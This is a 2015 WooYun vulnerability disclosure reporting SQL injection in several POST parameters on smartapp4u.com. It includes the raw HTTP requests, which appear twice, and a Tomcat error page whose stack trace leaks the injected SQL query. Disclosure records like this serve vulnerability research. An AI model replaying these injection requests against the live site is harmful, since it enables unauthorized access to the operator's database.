漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0137635
漏洞标题:精众移动广告联盟主站MySQL三处注射(多个参数)的打包提交
相关厂商:smartapp4u.com
漏洞作者: 路人甲
提交时间:2015-08-28 19:03
修复时间:2015-10-12 23:18
公开时间:2015-10-12 23:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开
简要描述:
啥都不说了,毕竟我提交了三处。上个首页吧!
详细说明:
给rank高些就可以了
POST /androidService/cpBonus/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 46
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpBonus/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&beginTime=2015-08-06&endTime=2015-08-11
参数beginTime&endTime可注射
=============================================
POST /androidService/productUpdate/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/productUpdate/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&productName=1
productName可注射
===========================================
POST /androidService/cpOfAdvertising/findAllAdver.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 73
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpOfAdvertising/toFindAllAdver.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&productId=0&adType=chaping&beginTime=2015-08-28&endTime=2015-08-28
参数productId&adType&beginTime&endTime可注射
=================================================
POST /androidService/cpBonus/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 46
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpBonus/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&beginTime=2015-08-06&endTime=2015-08-11
参数beginTime&endTime可注射
=============================================
POST /androidService/productUpdate/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/productUpdate/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&productName=1
productName可注射
===========================================
POST /androidService/cpOfAdvertising/findAllAdver.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 73
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpOfAdvertising/toFindAllAdver.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42;
Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276;
Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546
sort=&productId=0&adType=chaping&beginTime=2015-08-28&endTime=2015-08-28
参数productId&adType&beginTime&endTime可注射
=================================================
<mask>HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Fri, 28 Aug 2015 07:29:35 GMT
Connection: close
Content-Length: 12709
<html><head><title>Apache Tomcat/6.0.36 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1</h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u>Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1</u></p><p><b>description</b> <u>The server encountered an internal error that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
</pre></p><p><b>root cause</b> <pre>org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.doTranslate(SQLErrorCodeSQLExceptionTranslator.java:233)
org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:72)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:602)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:636)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:665)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:673)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:728)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:744)
org.springframework.jdbc.core.JdbcTemplate.queryForInt(JdbcTemplate.java:775)
cm.com.android.dao.impl.BaseSupport.getAllPage(BaseSupport.java:15)
cm.com.android.dao.impl.CpBonusDaoImpl.findAllBySplit(CpBonusDaoImpl.java:66)
cm.com.android.service.impl.CpBonusServiceImpl.findAllBySplit(CpBonusServiceImpl.java:39)
cm.com.android.action.CpBonusAction.findAll(CpBonusAction.java:103)
sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
java.lang.reflect.Method.invoke(Method.java:616)
org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:176)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:426)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:414)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:790)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:719)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:644)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
</pre></p><p><b>root cause</b> <pre>com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
java.lang.reflect.Constructor.newInstance(Constructor.java:532)
com.mysql.jdbc.Util.handleNewInstance(Util.java:389)
com.mysql.jdbc.Util.getInstance(Util.java:372)
com.mysql.jdbc.SQLError.createSQLException(SQLError.java:980)
com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3835)
com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3771)
com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2435)
com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2582)
com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2535)
com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1911)
com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:2034)
com.mchange.v2.c3p0.impl.NewProxyPreparedStatement.executeQuery(NewProxyPreparedStatement.java:76)
org.springframework.jdbc.core.JdbcTemplate$1.doInPreparedStatement(JdbcTemplate.java:643)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:586)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:636)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:665)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:673)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:728)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:744)
org.springframework.jdbc.core.JdbcTemplate.queryForInt(JdbcTemplate.java:775)
cm.com.android.dao.impl.BaseSupport.getAllPage(BaseSupport.java:15)
cm.com.android.dao.impl.CpBonusDaoImpl.findAllBySplit(CpBonusDaoImpl.java:66)
cm.com.android.service.impl.CpBonusServiceImpl.findAllBySplit(CpBonusServiceImpl.java:39)
cm.com.android.action.CpBonusAction.findAll(CpBonusAction.java:103)
sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
java.lang.reflect.Method.invoke(Method.java:616)
org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:176)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:426)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:414)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:790)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:719)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:644)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.36 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.36</h3></body></html><mask>
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-08-28 23:17
厂商回复:
Dlovej已经通知我们这个漏洞了,不过还是感谢你,也请大家不要再针对这个漏洞重复提交了。
最新状态:
暂无